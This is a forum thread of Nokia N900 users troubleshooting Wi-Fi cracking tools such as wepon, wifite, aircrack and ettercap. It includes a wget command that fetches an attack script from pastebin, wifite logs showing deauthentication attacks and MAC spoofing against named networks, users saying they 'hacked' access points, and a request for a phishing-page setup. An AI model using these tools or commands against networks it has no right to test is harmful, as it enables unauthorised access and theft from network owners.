This is without any traffic being generated by clients already attached to the AP.
This also depends on a few things: proximity to the AP, dropped packets, deauthentication notices and processes running in the background.
Try getting closer to the AP for starters, then make sure you have loaded the bleeding edge drivers properly.

fahadj2003
2011-07-05, 11:42
Is wifi.tgz necessary? Because I have bleeding edge drivers enabled and aircrack seems to work fine with those.. and I'm not sure if wifi.tgz has something additional.. *I'm still learning you know* :P

stevomanu
2011-07-05, 11:46
navigate to the directory you want to put the script in then run:

wget http://pastebin.com/raw.php?i=mBc1tKuL -O ./yamas_n900.sh && chmod +x ./yamas_n900.sh

This wget link is dead, can you reupload maybe???

mp17
2011-07-25, 14:14
I followed the tut here http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

When I open a new console I type in "root"
and then "wepon", but I get a permission denied. Any ideas?

torpedo48
2011-07-25, 14:24
I followed the tut here http://laboratorio.torpedo48.it/nokia-n900/guide/how-to-crack-a-wireless-network-s-wep-key-with-a-nokia-n900-fully-automated

When I open a new console I type in "root"
and then "wepon", but I get a permission denied. Any ideas?

Probably you haven't followed the guide properly. In this case you might want to repeat the chmod commands, in order to make wepon executable.

Mohammad
2011-07-25, 14:31
It does work again.

but how should I handle this? I am new to ettercap.

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 70)
Listening on wlan0...
ERROR : 92, Protocol not available
[ec_capture.c:capture_init:146]

pcap_open: wlan0: That device is not up

Try installing ettercap from this:
http://talk.maemo.org/showpost.php?p=1018150&postcount=1
Everything is working perfectly for me.

mp17
2011-07-25, 14:50
Probably you haven't followed the guide properly. In this case you might want to repeat the chmod commands, in order to make wepon executable.

I did repeat step 3 and chmod shows no error, but if I try these commands

# mv /home/user/MyDocs/wepon /usr/bin/
# mv /home/user/MyDocs/wepoff /usr/bin/

I get an error message:
"mv: cannot remove /usr/bin/wepon : Is a directory"

stevomanu
2011-07-25, 15:37
wrong post sorry

rooz
2011-08-20, 20:42
Does this actually harm anything on the network, or does it just give you the key to get access in a proper way?

Artzas
2011-08-20, 23:28
Hello guys, I'm new in the forum and I need your help. I did that hack successfully the first time but I can't do it any more!! It said (unable to generate enough IVS in time), it's capturing (0/sec) IVs and sometimes (3 to 70/sec) IVs!!! Please help :(

raverpol
2011-08-24, 13:07
How can I select "lower power threshold"? All the time I try to use wepon I get the message:
there are no targets with power level greater than 12dB

csaba93
2011-08-25, 21:49
Does this actually harm anything on the network, or does it just give you the key to get access in a proper way?

It doesn't harm anything as far as I know. It just generates the key for you. (Correct me if I'm wrong guys.)

regards
Csaba

khairyll
2011-08-31, 13:14
Guys,

Please help me... I already installed wifite and successfully hacked a few APs but I still got one problem...

[+] please select a menu option below:
[c]ontinue attacking; 3 methods left
[e]xit the program completely
[+] enter option (c, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2009, in attack
attack_wep_all(index)
File "/opt/wifi_mon/wifite.py", line 2472, in attack_wep_all
typed=raw_input()
EOFError

I kept getting this error when I tried to CTRL+C to attack the next AP, since I can't manually select the AP to attack. Any solution? Or maybe any command to modify wifite.py to make it manually select the AP rather than auto attack all....

pusak gaoq
2011-08-31, 15:46
Guys,

Please help me... I already installed wifite and successfully hacked a few APs but I still got one problem...

[+] please select a menu option below:
[c]ontinue attacking; 3 methods left
[e]xit the program completely
[+] enter option (c, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2009, in attack
attack_wep_all(index)
File "/opt/wifi_mon/wifite.py", line 2472, in attack_wep_all
typed=raw_input()
EOFError

I kept getting this error when I tried to CTRL+C to attack the next AP, since I can't manually select the AP to attack. Any solution? Or maybe any command to modify wifite.py to make it manually select the AP rather than auto attack all....

From your log there is no other AP detected that can be attacked....
Pressing CTRL+C is used to stop any attacks, while pressing C is used to try another method of attacking the AP, not selecting another AP to attack....

khairyll
2011-08-31, 17:13
From your log there is no other AP detected that can be attacked....
Pressing CTRL+C is used to stop any attacks, while pressing C is used to try another method of attacking the AP, not selecting another AP to attack....

Hi,

This is my full log... I got 2 APs but I want to attack jtlew instead of PS3... so I CTRL+C when it starts to attack PS3... but the error in red came out... any solution?

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[!] no wireless interfaces are in monitor mode!

[+] select which device you want to put into monitor mode:
1. wlan0 TI WL1251 wl12xx - [phy0]
[+] select the wifi interface (between 1 and 1): 1
[+] putting "wlan0" into monitor mode...
[+] searching for devices in monitor mode...
[+] defaulting to interface "mon0"

[+] waiting 30 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 29 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 28 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 27 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 26 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 25 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 24 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 23 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 22 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 21 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 20 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 19 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 18 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 17 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 16 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 15 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 14 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 13 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 12 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 11 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 10 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 9 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 8 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 7 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 6 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 5 seconds for targets to appear. 
press Ctrl+C to skip the wait [+] waiting 4 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 3 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 2 seconds for targets to appear. press Ctrl+C to skip the wait [+] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait

[0:00:31] 6 targets and 3 clients found

[+] added to attack list: "PS3-3823927" (15dB)
[+] added to attack list: "jtlew" (15dB)
[+] 2 access points targeted for attack

[+] in order to crack WPA, you will need to enter a dictionary file
[+] enter the path to the dictionary to use, or "none" to not crack at all:
none

[+] estimated maximum wait time is 45 minutes
[+] changing mac address to 00:70:39:A2:05:AB... changed!

[+] attacking "PS3-3823927"...
[0:05:00] starting wpa handshake capture
[0:04:43] sent 3 deauth packets; no handshake yet Nokia-N900:/root#
[0:04:41] attack on "PS3-3823927" interrupted

[+] please select a menu option below:
[n]ext attack (there is 1 target remaining)
[e]xit the program completely
[+] enter option (n, or e): Traceback (most recent call last):
File "/opt/wifi_mon/wifite.py", line 3542, in <module>
main() # launch the main method
File "/opt/wifi_mon/wifite.py", line 920, in main
attack(x - 1) # subtract one because arrays start at 0
File "/opt/wifi_mon/wifite.py", line 2007, in attack
attack_wpa(index)
File "/opt/wifi_mon/wifite.py", line 3045, in attack_wpa
typed=raw_input()
EOFError

khairyll
2011-08-31, 19:38
SOLVED!!

Upgrade busybox and no more issue.. thanks anyway

r4ste
2011-09-03, 16:50
Link is down, can someone reupload it?

justmemory
2012-05-30, 12:35
Hi, everyone!

I'm facing a problem with wepon, so I would like to ask for some help:

I upgraded the power kernel from v49 to v50 yesterday, and when I tested whether everything is working fine, I tried wepon and saw the following error message:

"BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ sudo gainroot
Root shell enabled


BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/home/user # wepon
insmod: error inserting '/opt/wifi_mon/compat.ko': -1 Unknown symbol in module
insmod: error inserting '/opt/wifi_mon/cfg80211.ko': -1 Unknown symbol in module
insmod: error inserting '/opt/wifi_mon/mac80211.ko': -1 Unknown symbol in module
insmod: error inserting '/opt/wifi_mon/wl1251.ko': -1 Unknown symbol in module
insmod: error inserting '/opt/wifi_mon/wl1251_spi.ko': -1 Unknown symbol in module
ifconfig: SIOCGIFFLAGS: No such device
nl80211 not found.
ifconfig: SIOCGIFFLAGS: No such device
ifconfig: SIOCGIFFLAGS: No such device
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; No such device.
ifconfig: SIOCGIFFLAGS: No such device
[!] unable to import pexpect
[!] if your chipset is intel4965; the fake-auth workaround will fail
[!] unable to import tkinter -- GUI disabled

.;' `;,
.;' ,;' `;, `;, WiFite r78
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: mass WEP/WPA cracker
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for backtrack4
':. /_____\ ,:'
/ \

[+] WARNING: recommended packages/apps were not found pyrit, cowpatty
[+] targeting networks with signal power greater than 12dB
[+] set WEP replay pps: 500/sec
[+] anonymous mac address enabled

[+] searching for devices in monitor mode...
[!] no wireless interfaces are in monitor mode!
[!] no devices are capable of monitor mode!
[!] perhaps you need to install new drivers
[+] this program will now exit."

The wifi was on, so I think there were wireless interfaces...
So I tried the following: I downloaded the wepon, wepoff and the wifi.tgz again, put them into the right folders, and typed the chmod +x commands. But it did not help, the error message is the same. Is it possible that wepon is not compatible with power kernel v50...? (With v49 it ran smoothly.)

thanks,

jm

mr_pingu
2012-05-30, 20:21
For power kernel 50 you need updated drivers:

http://talk.maemo.org/showthread.php?t=83718#post1193490

justmemory
2012-05-31, 15:52
For power kernel 50 you need updated drivers:

http://talk.maemo.org/showthread.php?t=83718#post1193490

thanks, mr_pingu, that worked for me! :)

j0zeph
2012-06-05, 11:30
Excuse me for being dumb maybe.

I don't know how to install those drivers...
I've got to the error that "justmemory" had, he solved it but I don't know what to do next.
It pisses me off because I got to this part using lots of tutorials and forum threads and I am stuck :(

Please give me a hint of what I have to do next to install the updated drivers.

Thanks!

vi_
2012-06-26, 10:02
Then there is a new version of wifite out. You can update your old version by going to the directory it is hosted in and running:

wifite --update

Just remember to run this script afterwards to fix the temp dir location problem:

sed -i "s/(prefix='wifite')/(prefix='wifite',dir='\/opt\/tmp')/g" /opt/wifi_mon/wifite.py;

zabaa
2013-03-15, 20:30
Hello all, I know that topic is old, but I have a problem.. I did all that you wrote in your guide (checked it a few times), later I opened a new x-terminal, pressed root, and wrote wepon, and I have something like that -> /usr/bin/wepon: line 3: /opt/wifi_mon/load.sh: not found python: can't open file '/opt/wifi_mon/wifite.py' : [Errno 2] No such file or directory :( What can I do, do you have some idea how to solve that? Thanks.

mony123
2014-02-12, 16:33
Hello karam,
I was wondering how did you create that phishing page using the fake network on the N900?
Can you please share instructions on how to set it up and how to install dhcp3-server on Maemo? Thanks

kumardodla
2015-12-17, 06:44
This is what I got :-s

Hi,

I am also facing the same issue. Can you tell me how it is solved??

Thanks.